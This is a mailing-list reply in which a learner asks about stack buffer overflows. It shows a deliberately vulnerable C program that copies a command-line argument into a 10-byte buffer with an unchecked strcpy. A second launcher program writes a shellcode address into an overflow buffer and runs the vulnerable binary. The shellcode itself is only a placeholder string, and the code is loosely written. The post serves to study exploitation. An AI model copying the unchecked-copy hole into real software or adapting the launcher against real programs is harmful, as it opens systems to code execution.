Re: Re: understanding buffer overflows

[secacc7 () hotmail com]

thx.. this was a great example. yesterday i posted a replay with a different email address so i think, it was not 
acceptet.

i edited your exampleas followed(maybe it was a bit different, im now at work..)

vuln.cpp:

#include <stdio.h>
#include <string.h>


int foo(char *a)
{
char buffer[10];
strcpy((char *)buffer,a);
return 0;
}

int main(int argc, char * argv[])
{
foo(argv[1]);
return 0;
}

test.cpp:

#include <stdio.h>

int main()
{
char shellcode[]="Your provided shellcode";
printf("Address of Shellcode:%p\n",&shellcode);
char buffer[20];

//to put the address of shellcode at the correct position of buffer ( i ve stack randmoization on   i thik so its not 
static) - in my case i thing it was "14"
//dont no the currect conversation: 
*(long *)&buffer[14]=(long *)&shellcode;

execlp("./vuln", "vuln", buffer, NULL);

}

ant this worked fine: after execute (./test) I get a result like this:

Address of shellcode: 0xbffff0c0 

and gdb says too that eip points to 0xbffff0c0

i think this looks good - does it?

anyway, i didnt get a new instance of the shell.

if think maybe the shellcode havnt worked.

greets michael!